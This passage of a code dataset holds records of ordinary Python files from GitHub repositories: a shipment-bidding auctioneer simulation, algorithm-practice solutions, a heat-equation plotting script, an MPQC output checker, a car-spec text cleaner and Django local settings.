not in self.entities.keys():\n self.entities[entity.type] = {}\n\n registration_key = self._registration(entity.type)\n self.entities[entity.type][registration_key] = entity\n\n if self.env.config.debug and self.region.id < 1:\n print(\"registration takes place in region: %s \"\n \"returned registration key: %s\"\n %(self.region.id,registration_key))\n\n return registration_key\n\n def unregister(self, type, registration_key) -> Entity:\n \"\"\"\n Unregisters an agent from this Auctioneer, using the assigned\n registration key.\n \"\"\"\n if type not in self.entities.keys():\n raise ValueError(\"Type `{0}' is not an understood entity!\"\n .format(type))\n\n return self.entities[type].pop(registration_key, False)\n\n def _registration(self, type):\n max_key = max(self.entities[type].keys(), default=0)\n\n for key in range(max_key): # attempt to fill `holes'\n if key not in self.entities[type].keys():\n return key\n\n return max_key + 1 # new key, one greater than the last\n\n def list_shipment(self, producer_bid): # name is porely chosen, easy way to change name in whole file?\n self.auctionable_shipments.append(producer_bid)\n\n def unlist_shipment(self,shipment_registration_key):\n self.auctionable_shipments = [producer_bid for producer_bid in self.auctionable_shipments\n if producer_bid.registration_key != shipment_registration_key]\n\n def list_container_bid(self, container_bid):\n self.container_bids.append(container_bid)\n\n def unlist_container_bid(self, container_registration_key):\n self.container_bids = [container_bid for container_bid in self.container_bids\n if container_bid.container_registration_key != container_registration_key]\n\n def match_containers_shipments(self):\n \"\"\"Matches the given list of container bids with list of avaiable shipments \"\"\"\n matches = surplus_maximisation(self.container_bids,\n self.auctionable_shipments)\n\n if self.env.config.debug:\n print(\"The following matches have been made in region %s:\"\n %(self.region.id))\n print(tabulate(matches, headers=[\"container registration key\",\n \"shipment registration key\",\n \"surplus\"]))\n return matches\n\n def invoice_producers(self, matches):\n ''' The auctioneer invoices the producer from the matched shipment.\n In the current situation, the auctioneer does not obtain part of the surplus.\n '''\n invoices = []\n invoice = namedtuple('invoice', 
'producer_id shipment_id amount_due')\n if matches is not None: # required because if len = 0 the for loop will produce an error\n for match in matches:\n # obtain shipment that is matched, shipment cannot be yet removed, needed to assign to container later\n shipment = self.entities[EntityTypes.SHIPMENT][match.shipment_registration_key]\n # create invoice\n for producer_bid in self.auctionable_shipments:\n if producer_bid.registration_key == match.shipment_registration_key:\n new_invoice = invoice(producer_id= shipment.producer_id,\n shipment_id= shipment.id,\n amount_due= producer_bid.biddingvalue -\n self.env.config.producer_surplus_percentage * match.surplus)\n invoices.append(new_invoice)\n\n if self.env.config.debug:\n print(\"The following invoices have been created:\")\n print(tabulate(invoices, headers=[\"producer id\",\"shipment id\",\n \"amount due\"]))\n\n return invoices\n\n def pay_container(self,matches):\n # pay the container\n if matches is not None:\n for match in matches:\n container = self.entities[EntityTypes.CONTAINER][\n match.container_registration_key]\n\n if self.env.config.debug:\n account_value_before = self.account_value\n\n for container_bid in self.container_bids:\n if container_bid.container_registration_key == \\\n match.container_registration_key and \\\n container_bid.shipment_registration_key == \\\n match.shipment_registration_key:\n payment = container_bid.biddingvalue +\\\n self.env.config.container_surplus_percentage \\\n * match.surplus\n container.account_value += payment\n # remove payment amount from auctioneer account\n self.account_value -= payment\n\n if self.env.config.debug:\n print(tabulate([[self.region.id,account_value_before,\n payment, container.id, self.account_value]],\n headers=[\"region id\", \"account value before payment\",\n \"payment amount\", \"container id\",\n \"account value after payment\"]))\n\n return\n\n\n\n def finalize_matchmaking(self,matches):\n '''I made a seperate function to unregister both container and shipments, otherwise it messes up the\n for loops in the invoice and container payment functions. 
And it seems nice to have a payment check\n        before the auctioneer finalizes its contact with the container and producer'''\n        if matches is not None:  # TODO: rewrite so the for loop sits back at the first indentation level\n            for match in matches:\n                shipment = self.unregister(EntityTypes.SHIPMENT, match.shipment_registration_key)\n                shipment.state = ShipmentState.AWAITING_PICKUP\n                # TODO: add blank lines between the different blocks\n                container = self.unregister(EntityTypes.CONTAINER, match.container_registration_key)\n                container.state = ContainerState.NEEDING_TRANSPORT\n                container.idle_days = 1  # reset to initial setting\n                container.idle_hours = 0  # reset to initial setting\n                container.shipment_contracts.append(shipment)\n                self.unlist_shipment(match.shipment_registration_key)\n                self.unlist_container_bid(match.container_registration_key)\n\n        return\n\n    def print_shipment_bid_info(self):\n        if EntityTypes.SHIPMENT not in self.entities.keys():\n            return\n        registered_shipments = []\n        for key in self.entities[EntityTypes.SHIPMENT]:\n            for bid in self.auctionable_shipments:\n                if key == bid.registration_key:\n                    bidding_value = bid.biddingvalue\n                    registered_shipments.append(\n                        [self.entities[EntityTypes.SHIPMENT][key].id, key, bidding_value])\n\n        print(tabulate(registered_shipments,\n                       headers=[\"shipment id\",\n                                \"shipment registration key\",\n                                \"bidding value\"]))\n\n    # just prints whatever the bids are in the container\n    def print_container_bid_info(self):\n        if EntityTypes.CONTAINER not in self.entities.keys():\n            return\n        registered_containers = []\n        for bid in self.container_bids:\n            for key in self.entities[EntityTypes.CONTAINER]:\n                if key == bid.container_registration_key:\n                    container_id = self.entities[EntityTypes.CONTAINER][key].id\n                    container_registration_key = bid.container_registration_key\n                    biddingvalue = bid.biddingvalue\n                    shipment_registration_key = bid.shipment_registration_key\n                    registered_containers.append([container_id,\n                                                  container_registration_key,\n                                                  biddingvalue,\n                                                  shipment_registration_key])\n\n        print(tabulate(registered_containers,\n                       headers=[\"container id\",\n                                \"container registration key\",\n                                \"bidding value\",\n                                \"shipment registration key\"]))\n\n    # Function below is written for the continuous environment\n    def continuous_matching(self):\n        # Continuous matching runs once per container, resulting in one\n        # match at a time\n        match = best_match(self.container_bids, self.auctionable_shipments)\n\n        if self.env.config.debug:\n            print(\"The following matches have been made in region %s:\"\n                  %(self.region.id))\n            print(tabulate(match, headers=[\"container registration key\",\n                                           \"shipment registration key\",\n                                           \"surplus\"]))\n\n        return match\n","repo_name":"anshum-gupta/Multi-Agent-System-Bidding-Bot","sub_path":"entities/auctioneer.py","file_name":"auctioneer.py","file_ext":"py","file_size_in_byte":10544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
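`surplus_maximisation` is imported from `tools` and not shown in this record; a plausible greedy sketch that keeps the highest-surplus compatible pairs first (illustrative only — the real matcher may solve the assignment optimally), using the bid attributes the record itself reads:

```python
from collections import namedtuple

Match = namedtuple("Match", "container_registration_key shipment_registration_key surplus")

def greedy_surplus_matching(container_bids, shipment_bids):
    # surplus = what the producer bid for the shipment minus what the container asks
    candidates = sorted(
        (Match(c.container_registration_key, s.registration_key,
               s.biddingvalue - c.biddingvalue)
         for c in container_bids
         for s in shipment_bids
         if c.shipment_registration_key == s.registration_key),
        key=lambda m: m.surplus, reverse=True)
    matches, used_c, used_s = [], set(), set()
    for m in candidates:  # take each container/shipment at most once
        if (m.surplus >= 0 and m.container_registration_key not in used_c
                and m.shipment_registration_key not in used_s):
            matches.append(m)
            used_c.add(m.container_registration_key)
            used_s.add(m.shipment_registration_key)
    return matches
```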
+{"seq_id":"74940948378","text":"# baekjoon 알고리즘 1644\n# 2023.09.17 이주현\n\nimport sys\nimport math\n\nnum = int(sys.stdin.readline())\n\n# 에라토스테네스의 체 => 다시 보기\ncheck_array=[False,False] + [True for i in range(num-1)]\nfor i in range(2, int(num**0.5)+1): \n check_array[i*2::i] = [False]*((num-i)//i) \n\nprime_list = []\nfor i in range(num +1):\n if check_array[i]:\n prime_list.append(i)\n\n\nanswer = 0\nstart = 0\nend = 0\nwhile end <= len(prime_list):\n tmp = sum(prime_list[start:end])\n if tmp == num:\n answer += 1\n end += 1\n elif tmp < num:\n end += 1\n else:\n start += 1\n\nprint(answer)\n","repo_name":"beOk91/algo_pago_gago","sub_path":"src/ljh/baekjoon/silver/baekjoon_1644.py","file_name":"baekjoon_1644.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15294308829","text":"def count_animals(sentence):\n count = 0\n for i in sentence.split():\n if i.isdigit():\n x = int(i)\n count += x\n return count\n\n\nimport re\n\n\ndef CountAnimals(sentence):\n return sum(map(int, re.findall(r'\\d+', sentence)))\n","repo_name":"ictcubeMENA/Training_one","sub_path":"codewars/7kyu/dinamuh/HowManyAnimalsAreThere/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24981324321","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nfrom matplotlib.pyplot import cm\nfrom tqdm import tqdm\nfrom matplotlib import rc\n\n\n#Latex font for plots\nrc('font', **{'family': 'serif', 'serif': ['Computer Modern']})\nrc('text', usetex=True)\nrc('font', family='serif')\nplt.rcParams.update({'font.size': 10}) # Setting all font sizes\n\n\nprint(\"Which Task you want to run 1-dim , 2-dim or Lithosphere?\")\nprint(\"Write 1 , 2 or 3\")\n\nTask = input(\"Write here: \")\n\nw = 5.78851 # Latex document text width\nif Task == \"1\":\n\n L = 1.0\n u_list = []\n x_list = []\n t_list = []\n\n for method in [\"Analytic:\",\"FE:\", \"BE:\", \"CN:\"]:\n for dx in [0.1, 0.01]:\n dt = 0.5*dx*dx\n #Generate t-mesh\n T = int(1.0/dt) #Number of time steps till final time\n t = np.zeros(T)\n for l in range(len(t)):\n t[l] = l*dt\n #Generate x-mesh\n N = int(1.0/dx) #Number of integration points along x-axis (inner points only)\n x = np.zeros(N+2)\n for k in range(len(x)):\n x[k] = k/(N+1)\n if method == \"FE:\":\n x_list.append(x)\n t_list.append(t)\n\n with open (method+str(dx)) as file:\n lines = file.readlines()\n u = np.zeros((len(lines),len(lines[0].split())))\n for i in range(len(lines)):\n u[i,:] = lines[i].split()\n\n u_list.append(u)\n\n fig = plt.figure();\n x,t = np.meshgrid(x,t)\n\n\n ax = fig.gca(projection='3d');\n # Plot the surface.\n surf = ax.plot_surface(x, t, u, cmap=cm.coolwarm,\n linewidth=0, antialiased=False);\n # Customize the z axis.\n #ax.set_zlim(-0.10, 1.40);\n for angle in range(0,230):\n ax.view_init(40,angle)\n ax.zaxis.set_major_locator(LinearLocator(10));\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'));\n plt.xlabel(\"x\")\n plt.ylabel(\"t\")\n name = method+\" dx = \"+str(dx)\n plt.title(name)\n #fig.savefig(\"plots/\"+name+\".png\")\n\n\n dx = [0.1, 0.01]\n for i in range(2):\n fig = plt.figure();\n fig.set_size_inches(w=w*0.8,h= 4.5)\n plt.title(\"Computed solutions at time = 0.1 \\n dx = %g\" % (dx[i]))\n plt.plot(x_list[i], u_list[i][int(len(t_list[i])/10)], \".\")\n plt.plot(x_list[i], u_list[2+i][int(len(t_list[i])/10)], \".\")\n plt.plot(x_list[i], u_list[4+i][int(len(t_list[i])/10)], \".\")\n plt.plot(x_list[i], u_list[6+i][int(len(t_list[i])/10)])\n #plt.plot(x_analytic, u_analytic[int(len(t_analytic)/10)])\n plt.legend([\"FE\", \"BE\", \"CN\", \"Analytic\"])\n plt.xlabel(\"x\")\n plt.ylabel(\"u(x,t=0.1)\")\n plt.savefig(\"plots/1dim/Comparison_0.1_\"+str(dx[i])+\".pgf\")\n\n\n fig = plt.figure();\n plt.title(\"Absolute difference between computed and analytical at time = 0.1 \\n dx = %g\" % (dx[i]))\n plt.plot(x_list[i], abs(u_list[i][int(len(t_list[i])/10)] - u_list[6+i][int(len(t_list[i])/10)]), \".\")\n plt.plot(x_list[i], abs(u_list[2+i][int(len(t_list[i])/10)] - u_list[6+i][int(len(t_list[i])/10)]), \".\")\n plt.plot(x_list[i], abs(u_list[4+i][int(len(t_list[i])/10)] - u_list[6+i][int(len(t_list[i])/10)]), \".\")\n plt.plot(x_list[i], abs(u_list[6+i][int(len(t_list[i])/10)] - u_list[6+i][int(len(t_list[i])/10)]))\n #plt.plot(x_analytic, u_analytic[0])\n plt.legend([\"FE\", \"BE\", \"CN\", \"Analytic\"])\n plt.xlabel(\"x\")\n plt.ylabel(\"u(x,t=0.1) - $u_{exact}$(x,t=0.1)\")\n #plt.ylim((-10**(-5),10**(-3)))\n plt.savefig(\"plots/1dim/Differences_0.1_\"+str(dx[i])+\".pgf\")\n plt.show()\n\n for i in range(2):\n fig = plt.figure();\n plt.title(\"Computed solutions at time = 0.2 \\n dx = %g\" % 
(dx[i]))\n plt.plot(x_list[i], u_list[i][int(len(t_list[i])/5)], \".\")\n plt.plot(x_list[i], u_list[2+i][int(len(t_list[i])/5)], \".\")\n plt.plot(x_list[i], u_list[4+i][int(len(t_list[i])/5)], \".\")\n plt.plot(x_list[i], u_list[6+i][int(len(t_list[i])/5)])\n #plt.plot(x_analytic, u_analytic[int(len(t_analytic)/5)])\n plt.legend([\"FE\", \"BE\", \"CN\", \"Analytic\"])\n plt.xlabel(\"x\")\n plt.ylabel(\"u(x,t=0.2)\")\n plt.savefig(\"plots/1dim/Comparison_0.2_\"+str(dx[i])+\".pgf\")\n\n fig = plt.figure();\n plt.title(\"Absolute difference between computed and analytical at time = 0.2 \\n dx = %g\" % (dx[i]))\n plt.plot(x_list[i], abs(u_list[i][int(len(t_list[i])/5)] - u_list[6+i][int(len(t_list[i])/5)]), \".\")\n plt.plot(x_list[i], abs(u_list[2+i][int(len(t_list[i])/5)] - u_list[6+i][int(len(t_list[i])/5)]), \".\")\n plt.plot(x_list[i], abs(u_list[4+i][int(len(t_list[i])/5)] - u_list[6+i][int(len(t_list[i])/5)]), \".\")\n plt.plot(x_list[i], abs(u_list[6+i][int(len(t_list[i])/5)] - u_list[6+i][int(len(t_list[i])/5)]))\n #plt.plot(x_analytic, u_analytic[int(len(t_analytic)/5)])\n plt.legend([\"FE\", \"BE\", \"CN\", \"Analytic\"])\n plt.xlabel(\"x\")\n plt.ylabel(\"u(x,t=0.2) - $u_{exact}$(x,t=0.2)\")\n #plt.ylim((-10**(-5),10**(-3)))\n plt.savefig(\"plots/1dim/Differences_0.2_\"+str(dx[i])+\".pgf\")\n plt.show()\n\n\nelif Task == \"2\":\n\n L = 1.0\n u_list = []\n dxlist = [0.1,0.01]\n\n for method in [\"Analytic\",\"Implicit\"]:\n for dx in dxlist:\n #2 different dt for analysing stability of scheme\n dtlist = [dx,dx/10,dx/100]\n for dt in dtlist:\n T = int(1.0/dt)\n #Generate t-mesh\n t = np.linspace(0,1,T)\n #Generate x- and y-mesh\n N = int(1.0/dx)\n x = np.linspace(0,1,N+2)\n y = np.linspace(0,1,N+2)\n filename = \"2dim_\"+method+\":dx=\"+str(dx)+\"dt=\"+str(dt)\n time = int(0.01*T) #The time we choose to sample the solution at\n with open(filename) as file:\n\n lines = file.readlines()\n u = np.zeros((len(x),len(y)))\n for i in range(len(y)):\n data = lines[time*len(x)+i].split()\n\n u[i] = data\n\n if dt == dx:\n fig = plt.figure();\n fig.set_size_inches(w=w*0.8,h= 3.5)\n x_,y_ = np.meshgrid(x,y)\n\n ax = fig.gca(projection='3d',xlim = (0,1.0),ylim = (0,1.0),zlim = (0,1.0));\n # Plot the surface.\n surf = ax.plot_surface(x_, y_, u, cmap=cm.coolwarm,\n linewidth=0, antialiased=False);\n # Customize the z axis.\n #ax.set_zlim(-0.10, 1.40);\n for angle in range(0,230):\n ax.view_init(40,angle)\n ax.zaxis.set_major_locator(LinearLocator(10));\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'));\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n name = \"2-dim \"+method+\": dx = \"+str(dx)\n plt.title(name)\n fig.savefig(\"plots/2dim/\"+method+\"/\"+str(dx)+\"/\"+name.replace(\" \",\"\")+\".pgf\")\n plt.close()\n\n #Printing maximum absolute differences\n u_list.append(u)\n combinations = len(dxlist)*3\n print(\"Mean absolute differences between implicit and analytical\")\n for i in range(combinations):\n diff = np.mean(abs(u_list[i]-u_list[combinations+i]))\n\n print(diff)\n\nelif Task == \"3\":\n w = 5.78851 # Latex document text width\n #fig = plt.figure();\n #fig.set_size_inches(w=w*1.0,h= 4.0)\n\n # Analytical solution to heat production\n analytic = []\n x = np.linspace(0,120,101)\n x_ = [x[:17],x[17:34],x[34:]]\n z_ = [\n [-0.28,-23.66,8],\n [-0.07,-15.26,92],\n [-0.01,-10.46,188]\n ]\n y2 = []\n for x,zone in zip(x_,z_):\n y = np.polyval(zone,-x)\n y2.append(y)\n\n\n analytic.append(np.concatenate((y2[0],y2[1],y2[2])))\n # Analytical solution to heat production + radioactive 
enrichment\n z_ = [\n [-0.28,-29,8],\n [-0.07,-20.6,92],\n [-0.11,-23.8,28]\n ]\n y3 = []\n for x,zone in zip(x_,z_):\n y = np.polyval(zone,-x)\n y3.append(y)\n analytic.append(np.concatenate((y3[0],y3[1],y3[2])))\n \"\"\"\n for i in range(len(analytic)):\n # Analytical solution of heat production plot\n plt.plot(np.linspace(0,120,101),analytic[i],\"--\")\n plt.xlabel(\"Depth [km]\")\n plt.ylabel(r\"Temperature $[^\\circ C]$\")\n plt.grid()\n plt.legend([\"Heat\",\"Enriched mantle $\\\\&$ No Decay\"])\n plt.title(\"Analytical\")\n plt.savefig(\"plots/Lithosphere/Analytical.pgf\")\n plt.show()\n \"\"\"\n\n #fig = plt.figure();\n #fig.set_size_inches(w=w*1.0,h= 4.0)\n Nx = 126\n Ny = 101\n u = np.zeros((Nx,Ny))\n numerical = []\n for filename in [\"Heat\",\"No_Decay\", \"Decay\"]:\n dx = 0.01\n dt = dx\n T = int(1.0/dt)\n #Generate t-mesh\n t = np.linspace(0,1,T)\n #Generate x- and y-mesh\n N = int(1.0/dx)\n with open(filename) as file:\n lines = file.readlines()\n for t in tqdm(range(T)):\n for i in range(Nx):\n data = lines[t*Nx+i].split()\n\n u[i] = data\n\n\n temp = u[int(Nx/2)]*1292 + 8\n depth = np.linspace(0,120,Ny)\n numerical.append(temp)\n # Numerical simulation of heat production plot\n \"\"\"\n plt.plot(depth,temp)\n plt.xlabel(\"Depth [km]\")\n plt.ylabel(r\"Temperature $[^\\circ C]$\")\n \"\"\"\n\n \"\"\"\n plt.legend([\"Heat\", \"Enriched mantle $\\\\&$ No Decay\"])\n plt.title(\"Numerical\")\n plt.grid()\n plt.savefig(\"plots/Lithosphere/Numerical.pgf\")\n plt.show()\n \"\"\"\n\n # Numerical vs Analytical for case 1 & 2 plot\n fig = plt.figure();\n fig.set_size_inches(w=w*1.0,h= 4.0)\n x = np.linspace(0,120,101)\n for i in range(len(analytic)):\n a = np.array(analytic[i])\n n = np.array(numerical[i])\n plt.plot(x,a)\n plt.plot(x,n,\"--\")\n plt.xlabel('Depth [km]')\n plt.ylabel(r\"Temperature $[^\\circ C]$\")\n plt.grid()\n plt.legend([\"Analytical: Heat\",\"Numerical: Heat\",\"Analytical: Enriched mantle $\\\\&$ No Decay\",\"Numerical: Enriched mantle $\\\\&$ No Decay\"])\n plt.savefig(\"plots/Lithosphere/Comparison.pgf\")\n plt.show()\n\n\n # Relative error plot\n fig = plt.figure();\n fig.set_size_inches(w=w*1.0,h= 4.0)\n x = np.linspace(0,120,101)\n for i in range(len(analytic)):\n a = np.array(analytic[i])\n n = np.array(numerical[i])\n z = abs((a-n)/(a))\n plt.plot(x[1:-1],z[1:-1])\n plt.yscale('log')\n plt.xlabel('Depth [km]')\n plt.ylabel('Relative error')\n plt.grid()\n plt.legend([\"Heat\",\"Enriched mantle $\\\\&$ No Decay\"])\n plt.savefig(\"plots/Lithosphere/Relative_Error.pgf\")\n plt.show()\n\n\n # Comparison between Numerical simulation of Decay and No Decay plot\n fig = plt.figure();\n fig.set_size_inches(w=w*1.0,h= 4.0)\n x = np.linspace(0,120,101)\n for i in range(1,len(numerical)):\n n = np.array(numerical[i])\n plt.plot(x,n)\n plt.xlabel('Depth [km]')\n plt.ylabel(r\"Temperature $[^\\circ C]$\")\n plt.grid()\n plt.title(\"Numerical Simulation\")\n plt.legend([\"Enriched mantle $\\\\&$ No Decay\", \"Enriched mantle $\\\\&$ Decay\"])\n plt.savefig(\"plots/Lithosphere/Decay_NoDecay.pgf\")\n plt.show()\n\n #Plots the difference at the end of the simulation with and without decay\n nodecay = np.zeros((Nx,Ny))\n decay = np.zeros((Nx,Ny))\n for filename in [\"No_Decay\", \"Decay\"]:\n dx = 0.01\n dt = dx\n T = int(1.0/dt)\n #Generate t-mesh\n t = np.linspace(0,1,T)\n #Generate x- and y-mesh\n N = int(1.0/dx)\n with open(filename) as file:\n lines = file.readlines()\n for t in tqdm(range(T)):\n for i in range(Nx):\n data = lines[t*Nx+i].split()\n if filename == 
\"No_Decay\":\n nodecay[i] = data\n\n elif filename == \"Decay\":\n decay[i] = data\n\n decay = decay*1292 + 8 # Scaling [0,1] --> [8,1300]\n nodecay = nodecay*1292 + 8 # Scaling [0,1] --> [8,1300]\n diff = (nodecay - decay)\n x = np.linspace(0,150,Nx)\n y = np.linspace(0,120,Ny)\n levels = np.linspace(0,35,100)\n plt.contourf(x,y,diff.T,levels=levels)\n cbar = plt.colorbar(ticks=[0,7,14,21,28,35])\n cbar.set_label(r\"$T_{diff} [^\\circ C]$\")\n plt.xlabel(\"Width [km]\")\n plt.ylabel(\"Depth [km]\")\n plt.savefig(\"plots/Lithosphere/Tdiff.pgf\")\n plt.show()\n\n maxtemp = np.max(diff.T)\n depth = np.argmax(diff.T[:,int(Nx/2)],axis=0)\n width = np.argmax(diff.T[int(Ny/2),:],axis=0)\n print(\"Max Temperature Difference = %g, happens at Depth = %g & Width = %g\" % (maxtemp, depth*1.2, width*1.2))\n\n\n#, \"Enriched mantle $\\\\&$ Decay\"\nelse:\n print(\"Please write either 1, 2 or 3\")\n","repo_name":"Moejay10/FYS4150","sub_path":"Project5/Codes/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":13521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"75067044378","text":"from .dev import *\nfrom .dev import env\n\nDEBUG = True\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = env(\n \"DJANGO_SECRET_KEY\",\n default=\"django-insecure-bomhcbhc#rmqp9&4k$_0sse4rc(a$#8jrahz(h%m!ud_so66$x\",\n)\n\nALLOWED_HOSTS = [\"localhost\", \"0.0.0.0\", \"127.0.0.1\"]\n\nEMAIL_BACKEND = \"djcelery_email.backends.CeleryEmailBackend\"\nEMAIL_HOST = env(\"EMAIL_HOST\", default=\"mailhog\")\nEMAIL_PORT = env(\"EMAIL_PORT\")\nDEFAULT_FROM_EMAIL = \"chandranandan.chandrakar@gmail.com\"\nDOMAIN = env(\"DOMAIN\")\nSITE_NAME = \"Django Content\"\n","repo_name":"implicitdefcncdragneel/django-content-dev-prod","sub_path":"djangocontent/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"28659189085","text":"import copy\r\n\r\nm, n = map(int, input().split())\r\nbox = [[*map(int, input().split())]for _ in range(n)]\r\n\r\ntomato = []\r\nminus_cnt = 0\r\nfor i in range(n):\r\n for j in range(m):\r\n if box[i][j] == 1:\r\n tomato.append((i, j))\r\n if box[i][j] == -1:\r\n minus_cnt+=1\r\n\r\n\r\ndef get_cnt(tomato):\r\n cnt = 0\r\n tmp = []\r\n for x, y in tomato:\r\n for dx, dy in [(1, 0), (0, 1), (-1, 0), (0, -1)]:\r\n nr, nc = x + dx, y + dy\r\n if 0 <= nr < n and 0 <= nc < m and box[nr][nc] == 0:\r\n box[nr][nc] = 1\r\n cnt += 1\r\n tmp.append((nr, nc))\r\n return cnt, tmp\r\n\r\nans = 0\r\ntotal = 0\r\nwhile True:\r\n cnt, tomato = get_cnt(tomato)\r\n total += cnt\r\n if cnt == 0:\r\n break\r\n ans += 1\r\n\r\nfor i in range(n):\r\n for j in range(m):\r\n if box[i][j] == 0:\r\n ans = -1\r\n break\r\n if ans == -1:\r\n break\r\nprint(ans)","repo_name":"hjle2/Algorithm","sub_path":"백준/Gold/7576. 토마토/토마토.py","file_name":"토마토.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33806445035","text":"#\n# compares MPQC4 outputs\n# usage: check.py \n#\n\n##########################################################\n# util\n##########################################################\n\n# should work with python 2 and 3\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport sys, re, math\nimport json\n\n# reload(sys)\n# sys.setdefaultencoding(\"utf-8\")\n\ndefault_precision = {\n \"Energy\" : 1.0e-9,\n \"GFRealPole\" : 1.0e-4,\n \"ExcitationEnergy\" : 1.0e-6\n}\n\ndef validate(label, data, refdata, tolerance):\n if not isinstance(data,list):\n data = [data]\n if not isinstance(refdata,list):\n refdata = [refdata]\n ok = True\n ndata = len(refdata)\n for i in range(ndata):\n datum = float(data[i])\n refdatum = float(refdata[i])\n if (math.fabs(refdatum - datum) > tolerance):\n print(refdatum)\n print(datum)\n ok = False\n break\n return ok\n\ndef pat_numbers(n):\n result = ''\n for i in range(n):\n result += '\\s*([+-e\\d.]+)'\n return result\n\ndef parse_json(file_name):\n match = False\n json_lines = \"\"\n with open(file_name, 'r') as file:\n for line in file:\n if match:\n json_lines += line\n if not match:\n match = re.match('^\\s*Output KeyVal \\(format=JSON\\):',line)\n\n result = json.loads(json_lines)\n return result\n\n\ndef total_energy(json):\n return json[\"property\"][\"value\"][\"value\"]\n\n\ndef get_precision(json):\n if \"precision\" not in json[\"property\"]:\n property = json[\"property\"][\"type\"]\n return default_precision[property]\n else:\n return float(json[\"property\"][\"precision\"])\n##########################################################\n# main\n##########################################################\nfile_name = sys.argv[1]\noutput_json = parse_json(file_name)\nvalue = total_energy(output_json)\n\nref_file_name = sys.argv[2]\nref_json = parse_json(ref_file_name)\nref_value = total_energy(ref_json)\n\n# how precise should we expect the results to agree? Depends on precision of both results\nprecision = max( get_precision(output_json), get_precision(ref_json) )\n\n\neok = validate(\"value\", value, ref_value, precision)\nok = eok\nif not ok: sys.exit(1)\n","repo_name":"ValeevGroup/mpqc","sub_path":"tests/validation/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"69"}
+{"seq_id":"28590494624","text":"class CarSpecExtractor:\n\n \n def cleanEmptyLists(self,lists):\n\n cleanLists = [l for l in lists if l != []]\n\n return cleanLists\n \n \n def replaceRepeatedKeys(self,keys):\n\n keysFilter = []\n\n for key in keys:\n if key[0] == 'Dianteiros' and key[1] == 'Traseiros':\n key = ['Freios dianteiros','Freios traseiros']\n\n if key[0] == 'Dianteira' and key[1] == 'Elemento elástico':\n key = ['Suspensão dianteira','Elemento elástico dianteiro']\n\n if key[0] == 'Traseira' and key[1] == 'Elemento elástico':\n key = ['Suspensão traseira','Elemento elástico traseiro']\n\n if key[0] == 'Dianteiros' and key[1] == 'Altura do flanco':\n key = ['Pneus dianteiros','Altura do flanco dianteiro']\n\n if key[0] == 'Traseiros' and key[1] == 'Altura do flanco':\n key = ['Pneus traseiros','Altura do flanco traseiro']\n\n keysFilter.append(key)\n \n\n return keysFilter\n\n def cleanRawValues(self,values):\n\n valuesFilter = []\n\n for value in values:\n\n if len(value)>2:\n value = [v for v in value if v!=\"1\"]\n value = [v for v in value if v!=\"2\"]\n value = [v for v in value if v!=\"3\"]\n\n value = [v for v in value if \"\\n\" not in v]\n \n for v in value:\n if v==' kg/cv' or v==' kg/kgfm':\n value[0]=value[0]+value[1]\n value.pop(1)\n\n if 'rpm' in v and 'kgfm' in v:\n value[-1]=value[-2]+value[-1]\n value.pop(-2)\n \n if len(value)>2:\n value[-1]= value[-2]+\" \"+value[-1]\n value.pop(-2)\n\n \n valuesFilter.append(value)\n\n return valuesFilter\n \n\n \n def transformKeys(self,keys):\n\n keys[-2] = ['Consumo urbano','Consumo rodoviario']\n keys[-1] = ['Consumo urbano2','Consumo rodoviario2']\n\n keys.append(['Autonomia urbana','Autonomia rodoviaria'])\n keys.append(['Autonomia urbana2','Autonomia rodoviaria2'])\n\n def checkDoubleFields(self,carSpecRaw):\n\n if 'Autonomia urbana' not in carSpecRaw:\n carSpecRaw['Autonomia urbana'] = carSpecRaw.pop('Consumo urbano2')\n carSpecRaw['Autonomia rodoviaria'] = carSpecRaw.pop('Consumo rodoviario2')\n\n","repo_name":"gms1992/carSpec","sub_path":"carspec/carscrap/extractor/CarSpecExtractor.py","file_name":"CarSpecExtractor.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29811676613","text":"import sys\n\ninput = sys.stdin.readline\n\n\n# 10845 큐\n# 간단한 기능을 가진 큐를 구현하는 문제\n# deque 모듈을 사용할 수도 있지만 연산의 수가 매우 적기 때문에\n# 단순히 리스트를 사용하여 구현하였다.\ndef sol10845():\n q = []\n head = 0\n cnt = 0\n answer = []\n for _ in range(int(input())):\n cmd = input().split()\n if len(cmd) == 2:\n q.append(cmd[1])\n cnt += 1\n else:\n t = cmd[0][0]\n if t == 'p':\n if cnt:\n answer.append(q[head])\n head += 1\n cnt -= 1\n else:\n answer.append('-1')\n elif t == 'f':\n answer.append(q[head] if cnt else '-1')\n elif t == 'b':\n answer.append(q[-1] if cnt else '-1')\n elif t == 's':\n answer.append(str(cnt))\n else:\n answer.append('0' if cnt else '1')\n return '\\n'.join(answer)\n","repo_name":"Scalas/PS_BaekJoon","sub_path":"solutions/sol10845.py","file_name":"sol10845.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
